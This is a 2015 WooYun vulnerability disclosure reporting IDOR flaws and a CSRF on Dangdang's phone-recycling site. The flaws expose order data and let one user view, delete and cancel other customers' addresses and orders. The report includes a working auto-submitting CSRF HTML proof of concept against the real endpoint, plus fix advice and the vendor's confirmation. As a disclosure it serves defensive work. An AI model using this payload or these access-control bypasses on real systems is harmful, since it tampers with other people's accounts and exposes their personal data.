电商安全之当当网设计缺陷打包提交(影响32W订单信息、客户联系地址等)

编号161737
Urlhttp://www.wooyun.org/bug.php?action=view&id=161737
漏洞状态厂商已经确认
漏洞标题电商安全之当当网设计缺陷打包提交(影响32W订单信息、客户联系地址等)
漏洞类型设计缺陷/逻辑错误
厂商当当网
白帽子harbour_bin
提交日期2015-12-16 10:51:00
公开日期2016-01-28 17:10:00
修复时间(not set)
确认时间2015-12-16 00:00:00
Confirm Spend0
漏洞标签逻辑错误 设计不当 认证设计不合理
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank16
漏洞简介
RT
从login.dangdang.com登录的,应该是当当的...
漏洞细节

1、

URL:http://huishou.dangdang.com/

登录时跳转到当当的统一登入口, 应该是当当的网站.
2、查看大量手机估值订单信息

QQ截图20151216101843.png


对参数c进行遍历

huishou1.png


huishou2.png


可以看到回收数目、价格和结款方式

huishou3.png


3、收货地址2处越权, 1处CSRF
首先CSRF

越权4.png


POC:

<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="Generator" content="EditPlus®">
<meta name="Author" content="">
<meta name="Keywords" content="">
<meta name="Description" content="">
<title>Document</title>
</head>
<body>
<form method="post" action="http://huishou.dangdang.com/User/AddUserAddress" id="edit">
<input name="Name" type="text" value="王12">
<input name="MobilePhone" type="text" value="13888888888">
<input name="AreaName" type="text" value="江苏省南京市栖霞区">
<input name="Address" type="text" value="北京大道">
<input name="IsDefault" type="text" value="false">
</form>
</body>
<script>
document.getElementById("edit").submit();
</script>
</html>


证明一下

huishou5.png


联系方式越权删除
已知本账号中某一联系的id为2583,登录另一账号, 进行越权删除

越权2.png


修改id

越权1.png


删除成功

越权4.png


查看其他人联系方式
提交订单是修改参数a

越权 5.png


证明

越权 7.png


注意联系方式处,看到了其他人的联系方式
4、订单取消越权
登录账号A,点击取消订单

越权 8.png


越权 9.png


修改为账号B中订单号

越权 10.png


成功取消订单

越权 11.png


POC

已证明

修复方案

建议:
1、越权的话, 验证权限
2、CSRF, 验证referer, 添加token

状态信息 2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开
厂商回复感谢对当当安全的支持
回应信息危害等级:高漏洞Rank:16 确认时间:2015-12-16 12:14
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

打卡

大师兄02015-12-16 10:54:00